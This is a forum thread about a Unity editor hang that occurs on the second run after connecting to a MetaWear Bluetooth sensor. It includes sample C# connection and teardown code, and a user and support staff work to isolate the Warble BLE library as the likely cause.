https://forum.omz-software.com/topic/6775/what-this-error/1
CC-MAIN-2022-33
refinedweb
616
60.41
The Docker containers Webinar: on October 19, I held Part 1 of a three-part webinar series on Docker. For those of you who could not attend, this post summarizes the webinar material. It also includes some additional items that I’ve added based on the QA session. Finally, I will highlight some of the best audience questions and wrap up with our plans for Part 2. You can watch part 1 here. Docker & Containers I’m guessing that you’ve heard about Docker by now. Docker is taking the industry by storm by making container technologies accessible to IT professionals. First of all, let’s start with the basics: What is Docker, what are Docker containers, and how are they related? Docker is one part of the suite of tools provided by Docker Inc. to build, ship, and run Docker containers. Docker containers start from Docker images. A Docker image includes everything needed to start the process in an isolated container. It includes all of the source code, supporting libraries, and other binaries required to start the process. Docker containers run Docker images. Docker containers build on Linux kernel features such as LXC (Linux containers), Cgroups (control groups), and namespaces to fully isolate the container from other processes (or containers) running on the same kernel. That’s a lot to unpack. Here’s how Docker Inc. describes Docker: “Docker containers wrap a piece of software in a complete filesystem that contains everything needed to run: code, runtime, system tools, system libraries – anything that can be installed on a server. This guarantees that the software will always run the same, regardless of its environment. — What’s Docker?“ Docker Containers Examples Here are some real-world examples. Say your team is building several different web applications, which are most likely written in different languages. One application may be written in Ruby and another in Node.js. Each application requires its own system packages to compile things like libraries. Deploying these types of polyglot applications makes infrastructure more complex. As a result, Docker solves this problem by allowing each team to package the entire application as a Docker image. The image can be used to start your application where it runs the same regardless of the environment. The benefits are a clean hand-off between development and production (build images, then deploy them), development and production parity, and infrastructure standardization. Best of all, each Docker container will be fully isolated from others so that engineers can allocate more or fewer compute resources (such as CPU, Memory, or IO) to individual containers. This ensures that each Docker container has the exact amount of resources that it requires. First-time users and those considering Docker (or any other container technology) ask the question: What’s the difference between containers and virtual machines? Containers vs. Virtual Machines Naturally, this question came up in the webinar. I answered it in the QA on the community forum as well: “Docker’s about page has a good summary. Docker containers (and other container technologies) work by isolating processes and their resources using kernel features. This allows running multiple containers on a single kernel. Virtual machines are different. In this scenario there are multiple independent kernel with running on a single hypervisor. Each kernel running on the hypervisor sees a complete set of virtualized hardware. Nothing is virtualized in Docker’s case. Containers vs VMs also have different compute footprints–notably in memory. They use less memory because they don’t need to run an entire operating system. Finally, containers are also intended to run a single process. Virtual machines on the other hand can run many processes. Docker focuses on “operating system” virtualization while virtual machines focus on hardware virtualization.” In summary, containers run a single process. Virtual machines may run any number of processes. Containers run a single kernel. Virtual machines run on a hypervisor. Containers require less memory because you don’t need to allocate memory to a completely separate kernel. Both technologies allow resource control. Use Cases for the Development Phase Building software is one of the most complex human activities. It is constantly changing and full of complications. Complexity multiplies when engineers use multiple languages and data stores. Consequently, workflows become more complicated and bootstrapping new team members never goes as expected. Containers may be applied to the software development phase for drastic productivity increases—especially in polyglot teams. Docker is a great tool to leverage during the development phase. Here are some examples: - Automating development environments. Say you’re building a C program. You’ll need a bunch of libraries and other things installed on the system. This can be packaged as a Dockerfile and committed to source control. As a result, every team member will have the same environment independent of their own system. - Managing data stores. Perhaps you have one project that depends on database version A. Another project runs on version B. Running both versions may not be possible with your package manager. However, it’s trivial to start a container for version A and B, and then point the application to talk to the containers. - Improve cross OS development. Consider a team using Linux, OSX, and Windows. Building the application on each platform will create many problems. Instead, if you package the application as a Dockerfile, each team member can always run the same thing. - Development & production parity. Build and use an image in development. Then use it for staging and production. You can be certain that the same code is running the same way. Use Cases for the Deployment Phase Building software is only half the battle. After we’ve created it, we’ve got to deploy. This is where containers really shine. I’m a bit production biased these days so I’ll list the most important (and my favorite!) point first: - Standardizing deployment infrastructure. This one is massive! DevOps and traditional teams can build standardized infrastructure to run and scale any application. Even if a new language comes out, it’s no problem. Deploy with Docker and it doesn’t matter what’s inside the container. Running and orchestrating containers in production is the hottest topic right now. Watch this space. - Isolating CI builds. CI systems can be fickle. Each project may change the machine in some way: You may need to install some random software or drop artifacts everywhere. Don’t even get me started on project dependencies. With containers, all of these problems are a thing of the past. Run each build in an ephemeral container and throw it away afterward. No fuss, no muss. - Testing new versions. It’s a happy day. The newest version of Language X was just released and it’s time to migrate. You just want to test it out, so you setup a virtual machine to not break your existing setup. This is a resource heavy and time-consuming process. Docker makes this easy. Simply change the image tag from language:x to language:y. - Distributing software. You’ve just finished your tool in language X. Unfortunately, your tool has a ton of dependencies that your users may not be knowledgeable enough to install. Build a Docker image and push it to a Docker registry. Now anyone can pull down your image and run your software. This is especially nice for handing builds over to your QA team. Installation & Toolchain Docker can be installed on Windows, OSX, and Linux systems. The Windows and OSX versions run a Linux system with a Docker daemon. The Docker client is configured to talk to the virtual machine. The distribution’s package manager makes it easy to install Docker on Linux. Once Docker is installed, you can start using the larger Docker toolchain components. Everything is built on top of the Docker Engine. The Docker Engine is the daemon running on a computer that manages all containers. The docker command is a client. It makes API requests to the Docker Engine. This means that Docker follows a client/server model. They communicate over HTTP. Next comes Docker Registry. The Docker Registry is an image store. Users can push images to the registry so that other users can pull images to their installations. Users may employ the official registry for distributing public images. Paid plans are available if you need private images. You can also host your own Docker registry. The Docker community maintains a set of official images, including those for databases like MySQL, PostgreSQL, MongoDB, and many languages. Odds are, there is an official image for your use case. Docker Compose is a tool for developing and shipping multi-container applications based on a configuration file. You’ll definitely come into contact with this common tool. Docker Compose does all the heavy lifting and makes it easier to share and develop more complex applications. Docker Machine is a tool for bootstrapping Docker hosts. A Docker host is a machine that runs the Docker Engine. Docker Machine can create machines on cloud providers like AWS, Azure, GCP, and Rackspace. It can also create “local” machines using VirtualBox or VMWare. It’s hard to cover these tools well in a text format. Therefore, I recommend that you check out the Introduction to Docker course or watch the demo in the webinar. Both of these resources demonstrate basic Docker functionalities and how to use Docker Compose to build a multi-container application. Part 2: From Dev to Production The first session introduced the Docker concept and how to develop applications using Docker. The next session will focus on deploying Docker applications. I’ll cover production orchestration tools and wrap up with a cool demo on creating a multi-stage application with Docker Compose and Docker Machine. The webinar is currently planned for November, so stay tuned for the announcement. I hope to see you there!
https://cloudacademy.com/blog/docker-containers-how-they-work/
CC-MAIN-2018-30
refinedweb
1,641
59.6
Sampling image colors with Canvas Create your own eyedropper effect to extract colors from a drawing or photograph using HTML5 canvas methods. Introduction Sampling colors from an image can add interest and flexibility to websites such as a fashion site or home decorating site. Users can pick colors from sample images to change the look of a pair of jeans, a car, or a house. The getImageData and putImageData methods in the canvas API make sampling pixels or a whole photograph relatively easy. Several other Canvas APIs are used, drawImage to put the photo onto a canvas, the CanvasImageData object, and data property. Here we talk about how to use getImageData to sample colors on a photo to make a color coordinated picture frame. The frame is created by using the border property with Cascading Style Sheets (CSS), so it's not an integral part of the canvas or image. However, the syntax is displayed so that you can copy into your own webpage code. For additional reference, the color sample is also displayed in the individual Red, Green, Blue, and Alpha (transparency) values, the CSS color value, and the Hue, Saturation, and Value (HSV) value. The image data acquired using getImageData is also manipulated to convert a color photo to a black and white image. The putImageData method is used to put the manipulated data back onto the canvas. The example's HTML code sets up the canvas and input elements to get and select the URLs of photos. Four images are hard coded into the webpage, but the input field lets you paste in any other image. When the app needs an simage to use, it gets the URL from the input field when the drop-down box (select element) changes or when the Load button is clicked. The full sample is available on the MSDN sample site. Getting the photo onto a canvas The first step in sampling the colors is to get the photo onto a canvas element. The canvas element by itself has no visual presence on the page. You need to add content for it to be useful, in this case an image. The canvas object only has a few methods and properties. Most of the drawing and manipulation of images on a canvas is accomplished using the CanvasRenderingContext2D object. The context object is returned by the getContext method of the canvas object with statement var ctx = canvas.getContext("2d");. Currently only a 2D context is supported in Windows Internet Explorer 9 and Internet Explorer 10, but 3D contexts such as the WebGL are supported in some other browsers. Unlike an img tag, the canvas element doesn't have a src property to assign a URL. In this example, an img element is created and the image is assigned to that. The image is later transferred to the canvas using the drawImage property on the context object. This next example creates global variables for the canvas element ("canvas") and the Context object ("ctx"). An image object is created ("image") that holds the photos as they are loaded. In the sample, the getImage() function sets the src of the image object to the value of the input field. The image takes some time to load, depending on the size of the file, so the webpage needs to wait for it to finish loading. To do that, the onreadystatechange event handler is used to monitor the image. Within the handler the readyState property is used to watch for a complete state value. function getImage() { var imgSrc = document.getElementById("fileField").value; if (imgSrc == "") { imgSrc = rootPath + samplefiles[0]; // Get first example document.getElementById("fileField").value = imgSrc; } image.src = imgSrc; //image.complete image.addEventListener("load", function () { var dimension = 380; // Deep dimensions reasonable. var dw; var dh; // set max dimension if ((image.width > dimension) || (image.height > dimension)) { if (image.width > image.height) { // scale width to fit, adjust height dw = parseInt(image.width * (dimension / image.width)); dh = parseInt(image.height * (dimension / image.width)); } else { // scale height to fit, adjust width dh = parseInt(image.height * (dimension / image.height)) dw = parseInt(image.width * (dimension / image.height)); } canvas.width = dw; canvas.height = dh; } else { canvas.width = image.width; canvas.height = image.height; } ctx.drawImage(image, 0, 0, dw, dh); // Put the photo on the canvas setBorder(); // Update color border }, false); } To keep the photo at a size that fits on the screen, the photo is scaled if it's too large. When the width or height are greater than the size of the canvas that's been designated, in this case 380 x 380 pixels, a scaling value is calculated. Because photos aren't necessarily square, only the largest dimension (width or height) is used for a scaling percentage. That value is used to scale the other dimension so the aspect ratio is preserved when displayed in the canvas. The photo is then copied to the canvas using the drawImage method. The drawImage method takes an image object, and x and y pixel coordinates that define the upper-left corner in the image. With these values you can specify where on the image to start displaying, which could be used to display portions of a tiled image for animation. The width and height parameters are also used, which specify the size to make the image. For this example, the width and height of the image are scaled to 380 pixels or less, shrinking the image to fit the canvas. The drawImage method also supports four more parameters that can be used to place the image in the canvas. For more info, see the drawImage reference page. Get a pixel value To get the value of a pixel, the getImageData method is used to get an imageData object. The imageData object contains an pixelArray that contains the actual pixels of the canvas image. The pixelArray is arranged in RGBA (red, green, blue, alpha) format. To find the value of a single pixel that is the target of a mouse click, you need to calculate the index into the pixelArray based on the x and y coordinates, and the width of the canvas. The formula ((y * canvas.width) + x) * 4 gets the offset into the array. To get each color, start with the first value at the offset into the pixelArray, and then get the next three values. This will give you the RGBA value for the pixel as shown here:]; What we've done here uses the getImageData method to read pixels directly from a canvas image. The getImageData method incorporates a security requirement that stops a canvas webpage from copying pixels from one computer domain to another (cross domain). A cross-domain image can be transferred to the canvas using drawImage, but when the getImageData method is used to copy the pixels to the pixelArray, it throws a DOM exception security error (18). The example contains a function called getSafeImageData() to catch cross domain errors without crashing the whole page. The getSafeImageData() function contains a try and catch statements to catch exceptions. If no exceptions occur, the function returns the pixelArray object. If a security error occurs on a canvas element, it sets the origin-clean flag (an internal flag) to false. No other image can be loaded until the flag is cleared, which is done by refreshing the page, or destroying and creating a new canvas. The getSafeImageData() function, upon catching an exception, removes the canvas element from the page, creates a new canvas, and assigns the same attributes and events to the new one. After the new canvas (with a clean-origin flag set to true) is created, the error message is printed to the new canvas. The getSafeImageData() function returns an empty string, which is used to signal that the getImageData method failed. From here, you should load another image from the samples, or your own in the same domain. To keep compatibility of the code between Windows 7 and Windows 8, the JavaScript parseInt() method is used to normalize the mouse coordinates to integers. In Windows 8, mouse coordinates are returned as floating point values to provide sub-pixel information for CSS and other UI functions. In this example, parseInt() is applied before the calculation to prevent rounding errors that will cause the wrong values to be returned from the pixelArray. As a side note, if you use a floating point number as an index into the pixelArray, it returns nothing because array indices are integer values only. The RGBA value of the pixel that is returned from the pixelArray is converted to a hex value and used as the background color for the CSS border. Only the RGB values are used, and the following example shows how to convert the three values to a single CSS compatible color. function getHex(data, i) { // Builds a CSS color string from the RGB value (ignore alpha) return ("#" + d2Hex(data[i]) + d2Hex(data[i + 1]) + d2Hex(data[i + 2])); } function d2Hex(d) { // Converts a decimal number to a two digit Hex value var hex = Number(d).toString(16); while (hex.length < 2) { hex = "0" + hex; } return hex.toUpperCase(); } In this example, the pixelArray value that was calculated based on the x/y mouse coordinates is passed to the getHex function. The getHex function calls the d2Hex() function that converts the decimal RGB values into two digit hex values. Each converted RGB value is concatenated into a string, and a "#" sign is added to the beginning to create the CSS color value format. This value is then used to set the color of the border style, along with some other properties. For example, a teal colored border with rounded corners and a 3-D look is style= 'border-color:#4E8087; border-width:30px; border-style:groove; border-radius:20px' . CSS elements The frame around the canvas is created using the border property. The default values are 30px wide, with a solid style and no border radius. As the values change, the syntax is displayed below the image. The color of the border is set when you click the image. The style and radius (rounded corners) values are picked from drop-down menus. The example offers five border styles. In addition of solid, you can choose 3-D border styles properties: Outset, inset styles, groove, and ridge. The outset and inset styles are flat frame styles with lighting effects. Grove and ridge styles are a more 3-D frame with lighting effects. The lighting effects give the appearance of a keylight coming from either the upper-left, or lower-right corner.; } } The border radius style drop-down menu provides four values, 5, 10, 20, and 30 pixels. These numbers are arbitrary, and can be set to any value you think is appropriate. As CSS style values are updated, the syntax line shown under the image is updated. Keeping data display readable The example uses the sampled color values as a background color for the color value (RGB, CSS, and HSV) display fields. All the display fields, and the image's border property are assigned a class="colorDisp. This allows the example to quickly set the background color on all the elements at one time. The displays are colored using the setDispColors() function, which passes in the background and font colors.; } } Because the background colors can range from a light beige to a deep dark black, the color of the font that is printed over the background is a concern. To ensure that the values are readable, the font color is set to either white or black, depending on the lightness or darkness of the colors. To figure out when to display one or the other, the sample color is converted to a gray scale, and if the value is greater than a set point (lighter), the text is printed black. Otherwise it's printed in white. The sample is set to a threshold of 128, or halfway between 0 and 255, the range of RGB colors. The following example shows the calcGray() function which determines the font color. This technique works with most colors, but you can experiment with the threshold to fine tune for you page. Convert a color photo to black and white The same technique we just used to get the colors from a single pixel can be used to manipulate all the pixels. In the next example, all the pixels in the pixelArray are sampled and modified to convert a color photo to black and white. Each pixel's Red, Green, and Blue values are averaged to get a single number. The original values of each color channel of the pixel is replaced by the averaged value. Because each channel has the same value, the result is a grayscale image made up of values that range from black to white. The "makeBW()" function shown in this example starts by getting the pixelArray from the canvas. A pair of for loops work through the pixelArray, getting each pixel value. The RGB values are added together and the sum is divided by three to get the average. The Alpha (or transparency) value is ignored. The resulting value is then copied back into each color value (RGB) of the pixel in the array. When all pixels have been converted, the putImageData method is used to put the pixelArray back into the canvas. function makeBW() { // Converts image to B&W by averaging the RGB channels, and setting each to that value ctx.drawImage(image, 0, 0, canvas.width, canvas.height); // refresh canvas imgData = getSafeImageData(0, 0, canvas.width, canvas.height); if (imgData != "") { for (y = 0; y < imgData.height; y++) { for (x = 0; x < imgData.width; x++) { var i = ((y * 4) * imgData.width) + (x * 4); var aveColor = parseInt((imgData.data[i] + imgData.data[i + 1] + imgData.data[i + 2]) / 3) imgData.data[i] = aveColor; imgData.data[i + 1] = aveColor; imgData.data[i + 2] = aveColor; } } ctx.putImageData(imgData, 0, 0); } } The code in the example kicks off when you click the Grayscale button. Click Load to reload the color image. Adding a sepia or cyanotype tint Turning a photo from color to black and white is a nice way to give a more nostalgic look to an image. To push the clock back ever further, you can go for a sepia or cyanotype tone. These processes have been used for over a hundred years to create effects and enhance their archival properties. The original processes used harsh chemicals to replace the silver in photographic paper with other compounds producing the color effects. With digital images, the process is similar, but with a lot less mess. Converting a photo to sepia or cyanotype involves essentially several steps. The following steps are done on each pixel: - Retrieve a pixel from the pixelArray. - Convert the pixel to black and white. - Convert the grayscale pixel (RGB) to HSV color model. - Add (or subtract) Hue, Sat, and Val to the pixel's HSV value to create the tint. - Convert the tinted pixel back to RGB color model. - Put the pixel back into the pixelArray. The following example shows the "rgb2hsv()" and "hsv2rgb()" functions, and the "makeTint()" function that adds the HSV values to the pixels. The tints are added as HSV values because it's easier to do with a single value. The Hue is the color based on a 360 degree scale, often shown in software as a color wheel. Saturation and Value (sometimes known as Lightness, Luminosity, or Brightness) are expressed as percentages (0-100%). Tinting an image to a sepia tone is done by adding a "Hue = 30", and a "Sat = 30" to the grayscale values. Nothing is added to the Val parameter for sepia tone. To create a cyanotype image, the formula is to add a "Hue = 220", and "Sat = 40". Val is set to add 10% to lighten the image just slightly, as the bluish tint can appear darker than you might want. This value is arbitrary, and could be different depending on the photos. For more info about these models, see the article HSL and HSV in the Wikipedia. function rgb2hsv(r, g, b) { // Converts RGB value to HSV value var Hue = 0; var Sat = 0; var Val = 0; // Convert to a percentage r = r / 255; g = g / 255; b = b / 255; var minRGB = Math.min(r, g, b); var maxRGB = Math.max(r, g, b); // Check for a grayscale image if (minRGB == maxRGB) { Val = parseInt((minRGB * 100) + .5); // Round up return [Hue, Sat, Val]; } var d = (r == minRGB) ? g - b : ((b == minRGB) ? r - g : b - r); var h = (r == minRGB) ? 3 : ((b == minRGB) ? 1 : 5); Hue = parseInt(60 * (h - d / (maxRGB - minRGB))); Sat = parseInt((((maxRGB - minRGB) / maxRGB) * 100) + .5); Val = parseInt((maxRGB * 100) + .5); // Round up return [Hue, Sat, Val]; } function hsv2rgb(h, s, v) { // Set up rgb values to work with var r; var g; var b; // Sat and value are expressed as 0 - 100% // convert them to 0 to 1 for calculations s /= 100; v /= 100; if (s == 0) { v = Math.round(v * 255); // Convert to 0 to 255 and return return [v, v, v]; // Grayscale, just send back value } h /= 60; // Divide by 60 to get 6 sectors (0 to 5) var i = Math.floor(h); // Round down to nearest integer var f = h - i; var p = v * (1 - s); var q = v * (1 - s * f); var t = v * (1 - s * (1 - f)); // Each sector gets a different mix switch (i) {; } // Convert all decimial values back to 0 - 255 return [Math.round(r * 255), Math.round(g * 255), Math.round(b * 255)]; } // Accept and add a Hue, Saturation, or Value for tinting. function makeTint(h, s, v) { // Converts color to b&w, then adds tint var imgData = getSafeImageData(0, 0, canvas.width, canvas.height); if (imgData != "") { for (y = 0; y < imgData.height; y++) { for (x = 0; x < imgData.width; x++) { var i = ((y * imgData.width) + x) * 4; // our calculation // Get average value to convert each pixel to black and white var aveColor = parseInt((imgData.data[i] + imgData.data[i + 1] + imgData.data[i + 2]) / 3) // Get the HSV value of the pixel var hsv = rgb2hsv(aveColor, aveColor, aveColor); // Add incoming HSV values (tones) var tint = hsv2rgb(hsv[0] + h, hsv[1] + s, hsv[2] + v); // Put updated data back imgData.data[i] = tint[0]; imgData.data[i + 1] = tint[1]; imgData.data[i + 2] = tint[2]; } } // Refresh the canvas with updated colors ctx.putImageData(imgData, 0, 0); } } function sepia() { // Refresh the canvas from the img element ctx.drawImage(image, 0, 0, canvas.width, canvas.height); makeTint(30, 30, 0); } function cyanotype() { // Refresh the canvas from the img element ctx.drawImage(image, 0, 0, canvas.width, canvas.height); makeTint(220, 40, 10); } Summary There are many other things you can do by grabbing the value of pixels in a canvas. For example, you can test sampled pixels for a specific color value, and overlay another image to do a simple chroma key (green screen) effect. This effect is used in television and movies to composite images that can put a weatherman in front of a raging storm or an actor on the top of a mountain, from the comfort of the studio. Related topics - Canvas Element - Canvas Properties - MSDN sample site - Contoso Images photo gallery - HSL and HSV Wikipedia article - Method Methods - Unleash the power of HTML 5 Canvas for gaming
https://msdn.microsoft.com/library/jj203843.aspx
CC-MAIN-2017-30
refinedweb
3,218
64.41
#include <openssl/x509.h> int X509_NAME_get_index_by_NID(X509_NAME *name,int nid,int lastpos); int X509_NAME_get_index_by_OBJ(X509_NAME *name,ASN1_OBJECT *obj, int lastpos); int -2 is returned. X509_NAME_entry_count() returns the total number of entries in name. X509_NAME_get_entry() retrieves the X509_NAME_ENTRY from name corresponding to index loc. Acceptable values for loc run from 0 to (X509_NAME_entry_count(name) - 1). The value returned is an internal pointer which must not be freed. X509_NAME_get_text_by_NID(), X509_NAME_get_text_by_OBJ() retrieve the ``text'' from the first entry in name which matches nid or obj, if no such entry exists -1 is returned. At most len bytes will be written and the text written to buf will be null terminated. The length of the output string written is returned excluding the terminating null. If buf is <NULL> then the amount of space needed in buf (excluding the final null) is returned. For a more general solution X509_NAME_get_index_by_NID() or X509_NAME_get_index_by_OBJ() should be used followed by X509_NAME_get_entry() on any matching indices and then the various X509_NAME_ENTRY utility functions on the result.. int i; X509_NAME_ENTRY *e; for (i = 0; i < X509_NAME_entry_count(nm); i++) { e = X509_NAME_get_entry(nm, i); /* Do something with e */ } Process all commonName entries: int loc; X509_NAME_ENTRY *e; loc = -1; for (;;) { lastpos = X509_NAME_get_index_by_NID(nm, NID_commonName, lastpos); if (lastpos == -1) break; e = X509_NAME_get_entry(nm, lastpos); /* Do something with e */ } X509_NAME_entry_count() returns the total number of entries. X509_NAME_get_entry() returns an X509_NAME pointer to the requested entry or NULL if the index is invalid.
https://www.commandlinux.com/man-page/man3/X509_NAME_get_text_by_OBJ.3ssl.html
CC-MAIN-2018-09
refinedweb
236
52.49
Technical blog on Microsoft ASP.NET (and AJAX and MVC). Let's start out with an innocent control that registers a simple script file include: public class BaseControl : Control { protected override void OnPreRender(EventArgs e) { Page.ClientScript.RegisterClientScriptInclude( GetType(), "InitScript", ResolveClientUrl("~/ScriptLibrary/BaseControlInitScript.js")); base.OnPreRender(e); } } All the script file does is show a little alert message when it is loaded. Stick as many of these BaseControl controls as you want on a page and the script gets included only once. This happens because ASP.NET uses the first parameter (type) and second parameter (key) in the call to RegisterClientScriptInclude to determine the uniqueness of the script. Now a customer decides to write a custom control that derives from my control and for whatever reason decides to add no new functionality (not that it matters, but this customer is really lazy!): public class DerivedControl : BaseControl { } What happens if you add one BaseControl and one DerivedControl to the page? How many scripts get included? Well, let's just say that I wouldn't be writing this blog if the answer was only one. Since the BaseControl used GetType() as its type parameter for RegisterClientScriptInclude, the return value of GetType() is unique for each type that derives from BaseControl. As we all know, typeof(BaseControl) != typeof(DerivedControl). Since the types are unique (and thus distinct), ASP.NET concludes that these are two distinct requests to register a script and it gets included twice in the rendered page. The fix, fortunately, is very simple. Just replace GetType() with something constant, such as typeof(BaseControl). This way when the code executes in the context of DerivedControl, the constant Type value remains the same, and ASP.NET removes the duplicate registration request. At this point you might wonder why ASP.NET detects duplicates based on type and key instead of based on URL. The answer: I have no idea why. A possible reason that it was done is that the same script URL might return different results each time. For example, maybe it's a script for advertisements and the URL is and it returns different script for each request. If ASP.NET eliminated duplicates it might cause a site to not work properly. Another reason is that different URLs get canonicalized to the same value. Should ASP.NET consider "foo.js" and "FOO.js" the same? On Windows they're the same, but on Unix they are not. Keep it simple. The reality is that it doesn't matter much anymore why it was done since that's the way it is. The important part is that you have to be careful when you're writing controls that register scripts. Go take a look at all your calls to ASP.NET's Page.ClientScript and ASP.NET AJAX's ScriptManager and see what types you're passing in. Unfunny story: In my numerous years reviewing other people's sample ASP.NET controls you wouldn't believe how many people decided it was a good idea to pass in typeof(int) for the type parameter and the string "key" for the key parameter. Now I wonder how many people used two different sample controls on the same page and realized that they don't work together. What exactly is the difference between Control.ResolveUrl() and Control.ResolveClientUrl() and any recommendations on why one should be used over the other? Great post. Thanks. Hi, I was reading your article and I would like to appreciate you for making it very simple and understandable. This article gives me a basic idea of Registering Client script in asp.net and it will help me a lot. Check this link... It is also helpful for a beginner. Thank you very much!
http://weblogs.asp.net/leftslipper/archive/2007/04/13/registering-scripts-in-asp-net-controls-the-right-way.aspx
crawl-003
refinedweb
623
67.86
+ Post New Thread... REQUIRED INFORMATION Ext version tested: Sencha Touch 2 RC Browser versions tested against: Chrome 17.0.963.56 IOS 5 Safari (iPhone)... REQUIRED INFORMATION Ext version tested: Sencha Touch 2.0 RC Browser versions tested against: Chrome 17 on XP Android Browser... Sorry if this has already been posted but when using xtype:'store' I get the following error: Cannot create an instance of unrecognized alias:... If I create a non centred panel that is modal it does not dismiss even if hideOnMaskTap it true. Sample code:Ext.Viewport.add({ xtype:... If your app name is the same as a namespace you're trying to set in Ext.loader, it will be overridden when the name property updater is called. This... Are there any Sencha2 examples of setting listeners for Google Maps events (in Sencha2, Ext.Map). This is how we do it without Sencha
http://www.sencha.com/forum/forumdisplay.php?92-Sencha-Touch-2.x-Bugs/page118&order=desc
CC-MAIN-2014-10
refinedweb
148
67.25
If we pick a bale that we want to add hay to, then we can guarantee that Bessie cannot break through that bale. Therefore, once we have picked the bale, we can simulate in linear time whether Bessie can still escape by having her keep on breaking bales until she reaches one that she cannot break, and our chosen bale. If she can escape, then the bale we have selected doesn't work. However, this gives us an $O(N^2)$ algorithm which is too slow. To speed things up, let haybale $K$ be the rightmost haybale that is to the left of Bessie's starting place, and start simulating this process where haybale $K$ is the one we want to add hay to, keeping track of the rightmost bale that Bessie breaks. If we then select haybale $K-1$ as the bale to add hay to, we already know that Bessie can reach the rightmost haybale as mentioned above. If we sweep over the haybales from right-to-left, and keep track of the rightmost haybale, then we note that we do at most a linear amount of work. After sorting the haybales in $O(N \log N)$, we can do this in linear time. We do the same thing for the haybales to the right of Bessie, so the whole process is $O(N)$ after sorting. Here is Mark Gordon's code. #include <iostream> #include <vector> #include <algorithm> #include <cstdio> using namespace std; #define INF 1000000010 int main() { freopen("trapped.in", "r", stdin); freopen("trapped.out", "w", stdout); int N, B; cin >> N >> B; vector<pair<int, int> > A(N); for (int i = 0; i < N; i++) { cin >> A[i].second >> A[i].first; } sort(A.begin(), A.end()); int result = INF; int sp = lower_bound(A.begin(), A.end(), make_pair(B, 0)) - A.begin(); int j = sp; for (int i = sp - 1; i >= 0; i--) { while (j < N && A[j].first <= A[i].first + A[i].second) { result = min(result, A[j].first - A[i].first - A[j].second); j++; } } j = sp - 1; for (int i = sp; i < N; i++) { while (j >= 0 && A[i].first - A[i].second <= A[j].first) { result = min(result, A[i].first - A[j].first - A[j].second); j--; } } if (result == INF) { cout << -1 << endl; } else { cout << max(result, 0) << endl; } return 0; }
http://usaco.org/current/data/sol_trapped_silver.html
CC-MAIN-2018-17
refinedweb
391
79.8
Unity works perfectly with MetaWear sensor on first run, hangs on 2nd run Video recording of the issue: Unity support has come up a few times in this forum with no clear instructions on how to put it all together. I've managed to do so using the C# SDK, the Windows10 plugin, Warble and the .NET bindings. I'm happy to share the unity project somewhere online for others to use, as well as keep working on it to add iOS and Android support, which I will need. There is one problem with it, which I'm hoping someone here or at mbientlab can help me solve. Everything works perfectly the first time (connects, reading sensor data, etc) but if you stop the engine and run it a second time, unity hangs. The issue happens whether I clean up the Metawearboard or not (see onApplicationQuit in code below). It happens even if I don't read anything from the sensor. I've been told Unity hangs this way sometimes when threads are not disposed of correctly when the game is stopped. I'm not sure how else to work through this problem. Any hints would be tremendously appreciated! Thank you! public class ConnectToSensor : MonoBehaviour { private IMetaWearBoard metawear = null; async void Start() { try { Debug.Log("hello world"); metawear = MbientLab.MetaWear.NetStandard.Application.GetMetaWearBoard("C2:BD:D8:B2:EF:35"); Debug.Log("connecting..." + metawear.IsConnected); await metawear.InitializeAsync(); Debug.Log("connected!"); Debug.Log(metawear.IsConnected); Debug.Log(metawear.ModelString); } catch (Exception e) { // No exceptions are ever thrown Debug.Log(e); } } // Unity hangs on 2nd run whether this block is executed or not! private async void OnApplicationQuit() { Debug.Log("App quitting!"); if (metawear != null && !metawear.InMetaBootMode) { Debug.Log("Tearing down..."); metawear.TearDown(); Debug.Log("Disconnecting..."); await metawear.GetModule<IDebug>().DisconnectAsync(); Debug.Log("Disconnected!"); } } } There's nothing fancy about the C# SDK. It uses standard C# 7.0 features and classes, all of which work fine when used in a .NET Core, .NET Framework, or UWP app. Without knowing which line (or lines) of code is responsible for causing Unity to hang, I can't really provide any suggestions. Maybe more experienced Unity devs / users on the Unity forums can provide more insight. That's the thing, it's not a line of code that causes the freeze. It's re-loading the assembly for a second run. The unity logs just stop at "Reloading Assembly". No code gets executed. From my research, this type of behaviour apparently can happen if the assembly leaves a running thread or socket connection open after the first run. Is it possible that Warble or the SDK is not cleaning up all resources properly? I don't think I've seen confirmation by anyone on this forum about getting the sensor working with Unity fully, and I'm sure it's a common use-case for these Mbientlab sensors. Also it's so close to working fully! Would be happy to work through it with you if you have any ideas on where we can investigate. Thanks What I mean is, some line of code puts the Unity Editor into a state where it freezes upon the second play, unless you're saying that it always freezes regardless of whether you run any MetaWear code or not. Assuming it's the former, you'll need to start stripping away all the irrelevant code to pinpoint the exact cause. Since your example is pretty simple, the likely function is InitializeAsync. As previously stated, there's nothing fancy about the C# SDK. Everything there uses .NET Standard 2.0 libraries and C# 7.0 syntax. Regarding Warble, again, nothing fancy there. Everything there is standard functions / classes provided by the Windows 10 SDK. Hi Eric The editor freezes before any of my code executes. Not even the first line of debug is executed. It freezes when it tries to reload the metawear DLLs. That's why I can't really debug it myself. As I mentioned, I've read that this type of freeze (on the 2nd run) can happen if the DLL does not clean up all of its resources fully, such as, for example, a running thread. I'm not saying that you are doing anything fancy, or wrong or outside the .NET Standard library, but there could be something in the deallocation/teardown code that could be done differently to make it work with Unity. Of course I can look through your code and try to solve it, but it will be faster with your help as I don't know the code. ...or I can look for another sensor I guess, but the Metawear one is really good. I'll see if I spot anything in your code later today. You don't need to run a debugger to isolate the line(s) of code causing the issue. All you need to do is attempt to successfully play the scene in the editor multiple times. Start with a blank app, then progressively add MetaWear calls until it freezes. I've already suggested that the InitializeAsyncfunction is probably the line that does it. I'm not asking you to solve the problem, i'm asking you to isolate the problematic lines of code. Hey OK. Just to clarify. None of the MetaWear calls freeze Unity the first time around. The second time around, Unity won't even load the DLL. Now... the MetaWear call that needs to be run the first time, to cause the issue the second time is... InitializeAsyncas you suspected. Here is a discussion about someone else who's encountered the exact same freeze behaviour whilst writing with a c++ plugin that has multithreading in it: It does seem to be that all of this has to do with thread management / de-allocation, although I don't know what the solution is. Based on what was posted in that Unity forum thread, the Warble C++ code is most likely the cause of freeze then. InitializeAsyncdoes make BLE calls so to confirm this, remove the MetaWear functions and call Warble directly. All you really need to test is ConnectAsyncand Disconnect: Hi Eric. I will test both Warble calls directly tomorrow and get back to you. Thanks for your help working through this. Hi Guys, I following this thread for couple of days cause we have the same problem with Unity so I just tried this and confirm that when i call directly the Warble theUnity is Freezes! Eric - can you please help on this as we are also struggling with Unity that blocking our progress.. Looking forward for some solution on this Thanks! I can confirm that calling Warble directly causes Unity to go into this weird state where either of the following actions will cause Unity to hang: Any ideas on what Warble is doing that can be done differently Eric? Thx PS: I'm also getting a WarbleException: Attribute cannot be written...since upgrading to firmware 1.4.1, 